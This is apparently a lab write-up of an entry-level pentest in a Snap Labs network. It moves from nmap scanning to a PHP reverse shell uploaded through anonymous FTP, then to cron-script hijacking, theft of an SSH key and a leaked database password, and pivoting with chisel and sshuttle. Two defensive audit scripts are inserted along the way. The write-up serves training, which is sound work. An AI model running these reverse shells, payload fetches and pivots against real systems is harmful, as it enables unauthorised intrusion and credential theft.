Snap-labs (Entry Level Pentesting)

After we have downloaded our VPN file we can VPN into the network.
First I want to scan the edge network and see if I can gain a foothold on one of the edge machines
sudo nmap -sCV 10.10.0.0/24 -oA edge_machines
results
10.10.0.4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a0:3e:31:d7:16:fe:28:78:8b:5b:90:72:42:e5:67:a4 (RSA)
| 256 56:09:1f:b0:b1:88:47:01:e4:5a:4d:c1:89:13:60:1f (ECDSA)
|_ 256 d9:74:e4:6f:05:49:54:d3:ec:ed:7a:1c:b4:76:1d:c4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=33e9fb8d175421613fb4.access-snaplabs.io
| Subject Alternative Name: DNS:33e9fb8d175421613fb4.access-snaplabs.io
| Not valid before: 2024-01-10T00:00:00
|_Not valid after: 2024-04-09T23:59:59
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ubuntu machine
HTTP and HTTPS web server Apache 2.4.41
SSH
10.10.0.103
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.0.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 10918 Jul 25 2021 index.html
|_drwxrwxrwx 2 0 0 4096 Jul 25 2021 temp [NSE: writeable]
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ab:8f:b8:06:41:f2:dd:92:cd:c4:92:60:53:d4:cf:2e (RSA)
| 256 ac:96:0a:75:d0:88:ca:16:87:5f:7d:5b:a4:6f:cd:9e (ECDSA)
|_ 256 5e:ce:7a:e3:90:9e:dd:a7:4d:24:0f:8e:a3:d7:23:07 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open ssl/http nginx
| ssl-cert: Subject: commonName=10.10.0.103
| Not valid before: 2021-07-17T14:19:12
|_Not valid after: 2021-08-16T14:19:12
| http-robots.txt: 54 disallowed entries (15 shown)
| / /autocomplete/users /autocomplete/projects /search
| /admin /profile /dashboard /users /help /s/ /-/profile /-/ide/
|_/*/new /*/edit /*/raw
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was https://10.10.0.103/users/sign_in
|_ssl-date: TLS randomness does not represent time
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FTP (anonymous access allowed)
SSH
HTTP and HTTPS
We can see a robots.txt
10.10.0.181
Nmap scan report for 10.10.0.181
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c3:a6:3b:dc:4a:19:ba:d3:97:ce:7f:d3:df:af:da:df (RSA)
| 256 5e:9f:ee:d8:c8:5a:42:95:96:27:39:61:58:94:a6:d8 (ECDSA)
|_ 256 88:4d:51:17:06:bd:d2:8b:d7:3e:3c:79:7d:d5:38:95 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 126.05 seconds
SSH
HTTP web server
Let's scan all ports on the targets to see if we are missing anything
sudo nmap -p- --min-rate 10000 10.10.0.103 -oA all_ports_10.10.0.103
sudo nmap -p- --min-rate 10000 10.10.0.181 -oA all_ports_10.10.0.181
sudo nmap -p- --min-rate 10000 10.10.0.4 -oA all_ports_10.10.0.4
The only new ports we found were on host 10.10.0.103
Results
Nmap scan report for 10.10.0.103
Host is up (0.24s latency).
Not shown: 65486 closed tcp ports (reset), 43 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
443/tcp open https
8060/tcp open aero
9094/tcp open unknown
10.10.0.103
Looking through the output we can see that machine 10.10.0.103 allows anonymous FTP access, which seems like a good place to start
ftp anonymous@10.10.0.103
Listing the contents we find the following

Include in report: anonymous access via FTP.
We can see we have read access to index.html and rwx privileges within the temp directory.
Looking in the temp directory we cannot see anything

Let's check out the web server and see if it is connected in some way to the FTP server

We can see the default Apache installation page, which confirms this is indeed Ubuntu.
This is concerning: we have anonymous access to the root directory of the web server via FTP.
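As an added defender-side example (not the write-up's own code), the following Python script audits a vsftpd configuration against the Apache DocumentRoot for exactly this overlap: anonymous FTP that can write into the directory the web server serves. The two config texts are constructed for the demo; the directive names are the real vsftpd and Apache ones, and the fallback anon_root is an assumption.

```python
"""Audit a vsftpd configuration for anonymous write access that lands inside an
Apache DocumentRoot, the misconfiguration found on 10.10.0.103 above.
Added example, not part of the original write-up: the two config texts are
constructed for the demo; the directive names are the real vsftpd/Apache ones."""
import os
import re

# Constructed sample configs mirroring WEB2: anonymous FTP rooted at the web root.
VSFTPD_CONF = """\
listen=YES
anonymous_enable=YES
anon_upload_enable=YES
write_enable=YES
anon_root=/var/www/html
"""
APACHE_CONF = """\
<VirtualHost *:80>
    DocumentRoot /var/www/html
</VirtualHost>
"""

def parse_vsftpd(text):
    """Return vsftpd key=value directives as a dict, ignoring comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf

def document_roots(text):
    """Collect every DocumentRoot path from an Apache config."""
    return [m.group(1).strip('"') for m in
            re.finditer(r"^\s*DocumentRoot\s+(\S+)", text, re.M)]

def audit(vsftpd_text, apache_text):
    """Return a list of finding strings; an empty list means nothing flagged."""
    conf = parse_vsftpd(vsftpd_text)
    yes = lambda key: conf.get(key, "NO").upper() == "YES"
    findings = []
    anon_write = yes("anonymous_enable") and yes("write_enable") and yes("anon_upload_enable")
    if anon_write:
        findings.append("anonymous FTP users may upload files")
    anon_root = conf.get("anon_root", "/srv/ftp")  # assumed default: the ftp user's home
    for root in document_roots(apache_text):
        if os.path.commonpath([anon_root, root]) == root:
            findings.append(f"anonymous FTP root {anon_root} lies inside web root {root}")
            if anon_write:
                findings.append("uploaded files are served by Apache: code execution risk")
    return findings
```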
Let's check out HTTPS
We can see a GitLab application

Not much here.
I want to test if we can upload a PHP reverse shell to the FTP server's temp directory and trigger it in the URL.
Copy our PHP reverse shell into our working directory
cp /usr/share/webshells/php/php-reverse-shell.php ./
Add your IP and port for the connection
Log in to the FTP server
ftp anonymous@10.10.0.103
Change into the temp directory
Upload our rev.php shell
put rev.php

Start a nc listener
rlwrap -cAr nc -lvnp 9001
Navigate to http://10.10.0.103/temp/rev.php and, if we look back at our listener, we should have a shell on 10.10.0.103

We have our first shell, woohoo!
Let's enumerate the other web server and come back
HOST 10.10.0.181

when we click on "show me the goods" we can see the following

Looks like PHP syntax (given the get_repos.php); it is an array with the following key-value pairs:
name: website-dev. Looks like a possible web directory, project or role.
location: https://10.10.0.103/brandon/website-dev. The location or URL of the project.
author: brandon. The author of the website.
access: public. The level of access.
Let's check this URL out and see if we can find anything interesting
Looks like we have access to the GitLab server we found earlier

Add to report (sensitive information exposure)
Nothing interesting in these files, let's check the commit history
Checking through the commits we do find something interesting

Looks like we have a set of creds for the host 10.10.1.111 (Database gitlab), which could be reusable:
sa: VeryVeryVerySecure1!
Sensitive information exposure within the internal subnet; try them anywhere we can, starting with host 10.10.0.103.
Let's see if we can access the GitLab server using these credentials
No luck
host 10.10.0.103 WEB-2
shell as www-data
Alright, now we have our initial foothold within one of the external servers, let's get to know our landscape.
Let's upgrade our current shell; since this is an Ubuntu server python3 should already be installed, so
python3 -c "import pty;pty.spawn('/bin/bash')"
First I want to find any creds, keys, anything to escalate our privileges.
We need to find what users are on the system
cat /etc/passwd
We do find one user on the system

Let's see if we can find anything within the user brandon's home directory
ls -al /home/brandon

We do see a .ssh directory, let's see if we can find any private keys. We do not have permission yet, so let's see if we can su to users using the credentials we found earlier in the git commits

No luck
Let's download linpeas.sh onto WEB2 and see if we can find anything interesting
copy linpeas to working directory
cp /opt/linpeas/linpeas.sh ./
start a python3 server
python3 -m http.server 80
From our shell on WEB2 let's download the script into the /tmp directory
wget http://10.9.254.6/linpeas.sh
Let's run the script
bash ./linpeas.sh > linpeas.output
I personally like saving linpeas to an output file, easier to reference later on
Let's start a python http server on WEB2 so we can download our linpeas.output file
python3 -m http.server 9000
Let's download it to our local host
wget http://10.10.0.103:9000/linpeas.output
We do find something interesting happening in the cron.d directory
cd /etc/cron.d
We can see a cron job that isn't default

We can see the user brandon is executing the /etc/log-time.sh script, let's see what permissions we have on the script
ls -al /etc/log-time.sh

We can see the permissions for everyone are read, write and execute, meaning we should be able to drop a reverse shell into the script, and when the cron job executes it we should gain a shell as the user brandon
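As an added defender-side example (not the write-up's own code), here is a Python audit that parses cron.d entries and flags job scripts writable by group or world, the same weakness linpeas surfaced here. The cron entry and the script it points at are constructed in a temporary directory so the check runs anywhere.

```python
"""Audit cron.d entries for job scripts that are writable by users other than
the job's owner, the /etc/log-time.sh weakness found on WEB2 above.
Added example, not the write-up's own code: the cron entry and script are
constructed in a temporary directory so the check runs anywhere."""
import os
import stat
import tempfile

def parse_cron_d(text):
    """Yield (user, command_tokens) per job line in /etc/cron.d format
    (minute hour dom month dow user command); env assignments and comments skipped."""
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue
        if fields[0].startswith("@") and len(fields) >= 3:   # @reboot, @daily, ...
            yield fields[1], fields[2:]
        elif len(fields) >= 7:
            yield fields[5], fields[6:]

def writable_by_others(path):
    """True if the group or world write bit is set on path."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_cron_file(path):
    """Return [(user, script)] for commands that reference group/world-writable files."""
    findings = []
    with open(path) as fh:
        for user, cmd in parse_cron_d(fh.read()):
            for token in cmd:
                if token.startswith("/") and os.path.isfile(token) and writable_by_others(token):
                    findings.append((user, token))
    return findings

def demo():
    """Recreate the WEB2 scenario (constructed) in a temp dir and audit it."""
    tmp = tempfile.mkdtemp()
    script = os.path.join(tmp, "log-time.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\ndate >> /tmp/time.log\n")
    os.chmod(script, 0o777)  # the rwxrwxrwx seen with ls -al on WEB2
    cron_path = os.path.join(tmp, "log-time")
    with open(cron_path, "w") as fh:
        fh.write(f"* * * * * brandon /bin/bash {script}\n")
    return audit_cron_file(cron_path)

if __name__ == "__main__":
    for user, script in demo():
        print(f"cron job run as {user} executes writable script {script}")
```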
Let's reuse our rev.php script; we will change the port number to another, in my case port 9010
start a python server
python3 -m http.server 80
Download our rev1.php to our /tmp directory
cd /tmp
wget http://10.9.254.6/rev1.php
Now we want to append to the log-time.sh script so it runs our PHP script
echo "php /tmp/rev1.php" >> /etc/log-time.sh
Now we just need to wait for the cronjob to execute and we should have a hit on our listener.
Note: I was having problems executing our rev1.php, so I decided to reuse the rev.php we placed in the /var/www/html/temp/ directory.
Modify the log-time.sh script
echo "php /var/www/html/temp/rev.php" >> /etc/log-time.sh
Start a listener on port 9001
rlwrap -cAr nc -lvnp 9001
We get a hit after the cronjob executes

We now have a shell as brandon
Let's look through brandon's .ssh directory and see what we can find
We do find brandon's private key
cat /home/brandon/.ssh/id_rsa
Let's copy this to our local host and SSH into the machine
Give it the necessary permissions
chmod 600 id_rsa
Let's see if we can authenticate to WEB2
ssh -i id_rsa brandon@10.10.0.103
We now have SSH access to the WEB2 machine

Let's start branching out to other devices on the network
Checking the network interfaces within WEB2
HOST 10.10.0.181 WEB1
Let's see if we can SSH into 10.10.0.181 using brandon's private key
ssh -i id_rsa brandon@10.10.0.181
woohoo we can

Let's check if there are any other users on the box
cat /etc/passwd
no other users

Let's run linpeas and see if we can find anything
We should still have our python server up, so we can
cd /tmp
wget http://10.9.254.6/linpeas.sh
bash ./linpeas.sh > WEB1LP.output
Let's download the linpeas output file
Start a python server on WEB1
python3 -m http.server 9000
Download the output file to our local machine
wget http://10.10.0.181:9000/WEB1LP.output
Not a lot to go with, will review later
Now we have access to both the WEB1 and WEB2 external servers, we need to find a way to start pivoting into the internal servers located in the 10.10.1.0/24 subnet.
We need to find the IP addresses of the internal hosts (if we are not looking in our Snap Lab).
We can write a quick bash script to scan the internal subnet
for i in {1..255}; do (ping -c 1 10.10.1.${i} | grep "bytes from" &); done
Save this to a .sh file and upload it to the WEB1 host using a python server and wget
# local machine
python3 -m http.server 80
#web1 ssh shell
wget http://10.9.254.6/ping_internal.sh
Now let's execute the script
bash ping_internal.sh
We can see two IP addresses
10.10.1.100
10.10.1.111

I want to perform some port scanning on the internal servers, or at least identify any open ports.
Let's utilize chisel.
Clone the repo
git clone https://github.com/jpillora/chisel.git
Within the chisel directory we want to run
go build
Within /chisel/executables/linux we will find the executable; I like to change the file name for ease of typing
mv chisel_1.9.1_linux_amd64 ch.sh
Let's upload it to WEB1, your python server should still be up and running
#WEB1
wget http://10.9.254.6/ch.sh
First we want to set up the chisel server on our local machine
./ch.sh server -p 9010 --reverse
-p: allows us to specify what port chisel listens on
--reverse: tells the server (us) that clients connecting in are allowed to define reverse tunnels, essentially meaning connecting clients can open listening ports on our local machine
Now the client (WEB1): since we have already transferred ch.sh (chisel), the basic syntax is
./ch.sh client <server ip (our local machine ip)>:<server port (our local machine port)> <remote string> <optional more remote strings>
./ch.sh client 10.9.254.6:9001 R:1080:socks
looking back at our local machine we should see a connection

Now we can configure our proxychains file to route through chisel. We need to edit the proxychains.conf file
sudo vi /etc/proxychains.conf
We need to create an entry pointing to our local host and port 9010

Now we should be able to proxy our nmap scan through proxychains and chisel and scan the internal network
sudo proxychains -q nmap -Pn 10.10.1.100
sudo proxychains -q nmap -Pn 10.10.1.111
Hmm, it didn't work
Let's try sshuttle instead
We will target WEB2 (10.10.0.181); if we remember, this was the web server that is connected to a database
For reference

To initiate sshuttle we can
sshuttle -r user@targetip targetsubnet -e 'ssh commands, are we using a key?'
sshuttle -r brandon@10.10.0.181 10.10.1.0/24 -e "ssh -i id_rsa"

Now we should be able to run nmap scans (on particular ports). Since we know there is a connection to a database, and we know there is a Windows Domain Controller, it is most likely MSSQL, whose default port is 1433
sudo nmap -p 1433 -Pn 10.10.1.111
We are having problems with nmap going through sshuttle.
We know it is connected to the database, so we should be able to connect directly; for this we will use impacket's mssqlclient.py
Let's try chisel again
Let's create a socks proxy so we can proxy through 10.10.0.181 into the internal subnet of 10.10.1.0/16
target server 10.10.0.181
#upload chisel
./chisel client 10.9.254.6:9001 R:socks
local machine
sudo /opt/chisel/chisel server -p 9001 --reverse
Scanning 10.10.1.111
proxychains -q nmap -sT -Pn -F 10.10.1.111
-q: quiet
-sT: SYN scans won't work through our pivot, we have to specify a full TCP connect scan
-F: switch for fast scan